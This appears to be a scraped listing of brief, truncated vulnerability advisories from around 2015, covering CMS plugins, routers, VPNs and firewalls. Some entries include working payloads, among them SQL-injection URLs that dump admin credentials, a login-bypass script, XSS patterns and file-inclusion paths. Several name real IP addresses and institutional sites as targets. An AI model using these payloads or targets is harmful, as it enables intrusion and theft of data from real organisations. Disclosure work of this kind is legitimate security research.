Drupal up to 7.38 Ajax Handler a Tag cross site scripting
No description provided by source...
Cyberoam - Blind SQL Injection
Description: The username field in the captive portal of the Cyberoam NG firewall is vulnerable to SQL injection and can be exploited to execute SQL commands on the database. The username field is vulnerable to the following types of SQL injection: (a) Boolean-based blind SQL injection, (b) Stacked...
Apple OS X Entitlements Rootpipe Privilege Escalation
This module exploits the rootpipe vulnerability and bypasses Apple's initial fix for the issue by injecting code into a process with the 'admin.writeconfig' entitlement. https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/...
Sudo <= 1.8.14 - Unauthorized Privilege
Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation Date: 07-23-2015 Exploit Author: Daniel Svartman Version: Sudo <= 1.8.14 Tested on: RHEL 5/6/7 and Ubuntu (all versions) CVE: CVE-2015-5602. Hello, I found a security bug in sudo, checked in the latest versions of sudo running...
Microsoft Internet Explorer Buffer Overflow Vulnerability MS15-093
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker could host a specially crafted website designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website; the vulnerability could then allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of the affected system. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Frequent use of Internet Explorer...
Ganglia Web Frontend < 3.5.1 - PHP Code Execution
1. Assuming that ganglia is installed on the target machine at this path: /var/www/html/ganglia/ 2. Assuming the attacker has minimal access to the target machine and can write to "/tmp". There are several methods where a remote attacker can also trigger daemons or other system processes to create...
Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability
WordPress Plugin 'WP Mobile Edition' is not filtering data, so we can get the configuration file at the path site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php CoderLeeT | Fallag...
Schneider Electric Modicon M340 PLC Station P34 Module Web Servers Security Vulnerability
Vulnerability details: The Schneider Electric Modicon M340 PLC Station P34 module is a programmable logic controller from the French company Schneider Electric. A security vulnerability exists in the Schneider Electric Modicon M340 PLC Station P34 module. A remote attacker could exploit it to obtain sensitive information, execute arbitrary code in the context of the web server process, bypass the authentication mechanism, and gain access to the affected device. Vulnerability type / remotely exploitable / impact: hardcoded credentials / yes / remote code execution; local file inclusion / no / directory traversal, file tampering; remote code inclusion / yes / remote code execution, denial of service; cross-site scripting / yes / disclosure of sensitive information. Affected device versions:...
Google Analyticator Multiple XSS Vulnerabilities
Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4: URL: http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator, Parameter Name: gaadsense, Parameter Type: POST, Attack Pattern: x'" onmouseover=alert(9); URL: http://example.com/wordpress/wp-admin/admin.php?page=google-analyticato...
OpenSSH keyboard-interactive authentication brute force vulnerability
OpenSSH (OpenBSD Secure Shell) is a set of connectivity tools maintained by the OpenBSD project for secure access to remote computers. It is an open-source implementation of the SSH protocol that encrypts all traffic, effectively preventing eavesdropping, connection hijacking and other network-level attacks. A security vulnerability exists in the 'kbdint_next_device' function in auth2-chall.c in sshd in OpenSSH 6.9 and earlier. A remote attacker could exploit it to conduct brute-force attacks or cause a denial of service (CPU consumption) via a long and duplicative list in the ssh -oKbdInteractiveDevices option. ---snip--- diff...
SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability
CVE-2012-4939 SolarWinds Orion IP Address Manager (IPAM) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affect...
WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input and allows downloading sensitive system files (lines 50-56): $file = urldecode($args['file']); $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.'); while (!feof($fh)) $txt .= fread($fh, 1024); //...
Edimax PS-1206MF Web Admin Auth Bypass
By default, it is necessary to know the current password in order to change it, but when the request is missing the POST parameters anewpass & confpass, the admin password will be set to null. devil@hell:$ curl -gi http://192.168.0.10/ HTTP/1.1 401 Date: Sat, 21 Dec 1996 12:00:00 GMT WWW-Authenticate: Basic...
Lezhixing (乐知行) Digital Campus System Local File Inclusion Vulnerability
No description provided by source...
Firefox < 39.0.3 - pdf.js Same Origin Policy Exploit
CVE-2015-4495 Description: This exploit allows an attacker to read and copy information on the victim's computer once they view a web site crafted with this exploit. //exploit.js: var starttimeout=2000; var sandboxcontexti=null; var DIRCACHE=; var FILECACHE=; var hidden=true; var mywinid=null; function...
Wireshark ZigBee Dissector Input Validation Vulnerability
A security vulnerability exists in the 'dissect_zbee_secure' function in epan/dissectors/packet-zbee-security.c in the ZigBee dissector in Wireshark 1.12.x before 1.12.7; it stems from the program improperly relying on a length field contained in the packet data. A remote attacker could exploit it to cause a denial of service (application crash) by sending a specially crafted packet....
WordPress NewStatPress Plugin 0.9.8 XSS + SQL Injection
Plugin URL: https://wordpress.org/plugins/newstatpress/ Affected version: 0.9.8 Active installs: 20,000+ CVE: CVE-2015-4062, CVE-2015-4063 1) SQL injection, CWE-89, CVE-2015-4062. CODE: includes/nsp_search.php:94 for($i=1;$i<=3;$i++) if($_GET["what$i"] != '' && $_GET["where$i"] != '') $where .= " AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";...
Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabili
CVE-2010-2032 Caucho Resin Professional is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of...
Zimbra 'view' Parameter Cross Site Scripting Vulnerability
CVE-2012-1213 Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the...
WordPress Shopping Cart 3.0.4 -- Arbitrary File Upload
Affected version: WordPress Shopping Cart 3.0.4 Date: 29-10-2014 Software link: https://wordpress.org/plugins/wp-easycart/ CVE: CVE-2014-9308 Category: application. Vulnerability details: any registered user can upload any file. Upload point: wp-easycart\inc\amfphp\administration\banneruploaderscript.php $date = $_POST['datemd5']; $usersqlquery = sprintf("SELECT ecuser., ecrole.adminaccess...
DedeCMS 5.7 /plus/flink_add.php SQL Injection Vulnerability
The filtering in common.inc.php starts out quite thorough; reading further: // convert the variables related to uploaded files, apply safety handling, and include the front-end generic upload function: if($_FILES) require_once(DEDEINC.'/uploadsafe.inc.php'); uploadsafe.inc.php // line 29: $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']); this can bypass GPC. plus\flink.php, although everything passes through...
espcms latest version: two high-risk SQL injection vulnerabilities with analysis (missed, still unfixed)
Brief description: definitely the latest version! Version info: V6.4.15.08.25 UTF8 official release, updated 2015-08-25 12:29:04, size 7.67MB. Updated on the 25th, and two high-risk injections remain unfixed. Details: the first is in enquiry.php: $ptitle = $this->fun->accept('ptitle', 'P'); $tsn = $this->fun->accept('tsn', 'P'); $did = $this->fun->accept('did', 'P'); if (empty($did) || empty($amount) || empty($ptitle)) $enquirylink =...
Apple Mac OS X 10.10.5 Buffer Overflow Vulnerability
No description provided by source...
Werkzeug Debug Mode Command Execution
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex' class Metasploit4 'Werkzeug Debug Shell Command Execution', 'Description' => %q This module will exploi...
WordPress Googmonify Plugin 0.8.1 - XSS/CSRF
Vulnerable Code : googmonify.php - Line 190,194,208 <input id="PID" name="PID" type="text" value="<?php echo $pid; ?>"> <input id="Limit" name="Limit" type="text" value="<?php echo $limit;?>" size="5"...
Multiple EMC RSA Products ESA-2015-081 Multiple Security Vulnerabilities
Affected products: RSA BSAFE Micro Edition Suite MES all 4.1.x versions prior to 4.1.3 RSA BSAFE Micro Edition Suite MES all 4.0.x versions prior to 4.0.8 RSA BSAFE Crypto-C Micro Edition Crypto-C ME 4.1 RSA BSAFE Crypto-C Micro Edition Crypto-C ME all versions prior to 4.0.4 RSA BSAFE Crypto-J all versions...
Discuz: front-end getshell via UC_KEY (2)
Brief description: http://drops.wooyun.org/papers/7830 already explains this fairly clearly. This vulnerability has been exploited for quite a while, including the earlier Tencent shell http://www.wooyun.org/bugs/wooyun-2010-092923, but the vendor still doesn't seem to take it seriously, so I am raising it again: no backend login is needed, it can be exploited directly from the front end (checking in while I'm at it ^-^). Searching WooYun for uckey turns up plenty of surprises. Details: \api\uc.php function updatebadwords($get, $post) { global $_G; if(!API_UPDATEBADWORDS) return...
Pligg CMS 2.0.2 CSRF Vulnerability
Create a new file and write a web backdoor into it to obtain a webshell. We can also use another method to get a shell: first use the first vulnerability to edit index.php in the site directory, then edit and save it. Once the save succeeds, view index.php; the test.php file has then been generated...
ESPCMS latest version backend login bypass
Brief description: 8.25 V6.4.15.08.25, picking up a leftover. Details: with the encryption algorithm, under normal circumstances we cannot recover the key. He added this piece of code: function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) { $result = null; if ($operation == 'ENCODE') { if (extension_loaded('mcrypt') && $mcrype) { $result = $this->encryptCookie($string, $key); } else...
IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution
IBM Security AppScan Standard OLE Automation Array Remote Code Execution Author: Naser Farhadi Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 Date: 1 June 2015 Version: <= 9.0.2 Tested on: Windows 7 Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ if...
ElasticSearch < 1.4.5 / < 1.5.2 - Path Traversal
No description provided by source. #!/usr/bin/env python # -*- coding: UTF-8 -*- import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class TestPOC(POCBase): vulID = '89268' version = '1' vulDate = '1431878400' createDate = '1442937600'...
74cms latest version: reset any account's password
Brief description: the password reset mechanism can be bypassed, and any account's password can be reset; tested successfully on the demo. Details: first look at \user\user_getpass.php: $act = !empty($_REQUEST['act']) ? trim($_REQUEST['act']) : 'enter'; $smarty->assign('headernav', "getpass"); if ($act=='enter') { $smarty->assign('title', '找回密码 - '.$_CFG['sitename']); $token = substr(md5(mt_rand(100000, 999999)), 8, 16); // generate token...
WDS CMS /wds_news/article.php SQL注入
Exploit : http://Target/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cmsadmin-- Upload Shell : http://Target/wds_news/admin.php?mode=listfile Shell Path : http://Target/wds_news/filer/shell.php...
eYou (亿邮) Gateway: user mail information viewable without login verification
Brief description: the vulnerability allows the eYou gateway to be entered without an eYou login; only the user's email address is needed to log in and view the user's mailbox operations and related information. Details: /gw/user/php/user/userlogin.php?userid=XXX where XXX is the user's email address; knowing the email address is enough to enter the user's gateway, and if it is unknown it can be brute-forced. Proof: the address in the details above redirects you straight in...
Kingdee (金碟) Medical / Guangzhou Children's Hospital weak password affecting the information security of the whole hospital
Brief description: Details: 1. The online appointment registration system of Guangzhou Women and Children's Hospital, a cooperation between Kingdee and Alipay... This system slows to a crawl whenever appointment slots are released; looking at this interface really raises doubts.... 2. A scan: nmap 113.108.182.53 Starting Nmap 6.47 ( http://nmap.org ) at 2015-08-29 08:13 CST Nmap scan report for 113.108.182.53 Host is up (0.091s latency). Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http...
Cisco TelePresence Video Communication Server Expressway Information Disclosure Vulnerability
Cisco TelePresence Video Communication Server (VCS) Expressway is a telepresence video communication server from Cisco that integrates with unified communications and voice environments to provide the best experience for end users of a variety of communication tools. A security vulnerability exists in Cisco TelePresence VCS Expressway X8.5.2. A remote attacker could exploit it to bypass intended access restrictions and read configuration files by using the Mobile and Remote Access (MRA) role and creating a TFTP session....
Provincial Agricultural Machinery Purchase Subsidy Information Management System Backdoor
All parameters are submitted via POST and are base64 encoded and decoded. It can read and write files directly and execute SQL directly (the example below directly retrieves the administrator username and password). <form action="http://218.77.183.70/njbt2013/SystemManager/njssqy.aspx" name="test" method="post" enctype="multipart/form-data"> <input type="hidden" name="method" size="23" id="method" value="c3Fs" /> sql //<input...
Keeper IP Camera 3.2.2.10 - Authentication Bypass
Add permission verification...
DPtech (迪普) UMC Unified Management System SQL Injection
DPtech UMC Unified Management Center, examples: http://222.171.148.161/UMC/Login.action http://222.75.152.197:8080/UMC/Login.action http://222.47.70.3:8080/UMC/Login.action http://218.28.177.149/UMC/Login.action http://211.138.102.195:8080/UMC/Login.action Applies only to some models, not all of them. POST /UMC/Login.action HTTP/1.1 Host: 222.171.148.161...
XR Gateway Platform SQL Injection
SQL injection (POST) in the username field at IP/msa/main.xp. #!/usr/bin/env python # coding=utf-8 import requests def login(): url = target + '/msa/main.xp' data = {'Fun': 'msaAdminLogon', 'username': "admin' or'1'='1", 'password': '123456'} req = requests.post(url=url, data=data) print req.text def download(): url = target ...
Tendoo CMS 1.3 - XSS Vulnerabilities
Introduction: a stored and a reflected XSS vulnerability in the profile area of Tendoo CMS make the CMS vulnerable and can be used for stealing admin cookies and ....... . Stored XSS in http://localhost/tendoo/index.php/account/update in the First Name and Last Name inputs executes JavaScript code, and if the admin ...
A Weaver (泛微) system has a generic injection (official site and China Mobile as examples)
Brief description: sigh, I hear nobody pays attention to it any more? Details: taking the official site's system as an example, first look at the return values at login: http://.../login.do?message=102&verify= http://.../login.do?message=103&verify= Now we can capture the request and start injecting. Craft a universal login string and log in to the backend successfully.. The MD5 password decodes to 1 https://images.seebug.org/upload/201508/251408519374f80cad29bf6f64db873598ae86e0.png https://images.seebug.or...
Joomla com_informations component SQL Injection vulnerability
Verification method: http://target/index.php?option=com_informations&view=sousthemes&themeid=-3 SQLI Injected column is 3 http://target//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23...
Raonet Subscriber Ethernet Router MySQL Database Account Password Disclosure
Raonet SER-500 router MySQL account password disclosure; remote login is possible with high privileges. Verification URL: http://61.77.63.86/inc/conndb.inc Google dork: intitle:Raonet Subscriber Ethernet Router #!/usr/bin/env python import urlparse import re import urllib2 def assign(service, arg): if service != "www": return arr = urlparse.urlparse(arg) return True,...
D-Link Cookie Command Execution
This module exploits an anonymous remote upload and code execution vulnerability on different D-Link devices. The vulnerability is a command injection in the cookie handling process of the lighttpd web server when handling specially crafted cookie values. This module has been successfully tested ...
NetentSec (网康) VPN Device 6.3.1 Unauthorized Access
Although the NetentSec VPN device has authorization checks in place, most pages can be reached by bypassing them. 1. https://xx.xx.xx.x/vpnweb/bulletin.php?para=admin/index.php bypasses authentication and goes straight to the backend; capture the request with Burp to get the URL! The NetentSec VPN device also has a design flaw that allows a remote reboot: visit the device address https://xxx.xx.xx.xx//admin/devicestatus.php directly and click reboot, and the device restarts! Affected model: version 6.3.1...
Campus Card Electronic Service Platform: card number lookup accessible without authorization
The administrator function for looking up user names and card numbers can be accessed without authorization, so an attacker can enumerate card numbers to obtain every user's name and card number. The key problem is that the default password for card numbers on this campus card service platform is 888888; some users may not have changed it, so after obtaining card numbers an attacker can try logging in with the default password. The platform also includes online payment and supports SSO login, so users' campus card funds may be affected. Google keyword: 校园卡电子服务平台 (campus card electronic service platform); the following users were found to have this problem. Shandong University: http://card.sdu.edu.cn/Account/SearchUserInfo China University of Petroleum: http://card.upc.edu.cn/Account/SearchUserInfo Hebei University of Technology...
Sky Classroom (天空教室) Course Selection Universal Management System Arbitrary File Upload Vulnerability
Register a teacher account for publishing courses; in the upload of the 2D course selection list, arbitrary files can be uploaded. GetShell is possible...
Discuz 7.2 Reflected XSS Vulnerability
Test link: target IP:/logging.php?action=logout&formhash=b1abb3e2&referer=%27-alert%28document.domain%29-...
74cms 20150817 design flaw leads to injection in 8 different files (gpc=off)
Brief description: dumps data directly. Details: download at http://download.74cms.com/download/74cmsv3.6beta20150817.zip. The global file of 74cms is include/common.inc.php, which contains: if (!empty($_GET)) $_GET = help::addslashes_deep($_GET); if (!empty($_POST)) $_POST = help::addslashes_deep($_POST); $_COOKIE = help::addslashes_deep($_COOKIE); $_REQUEST =...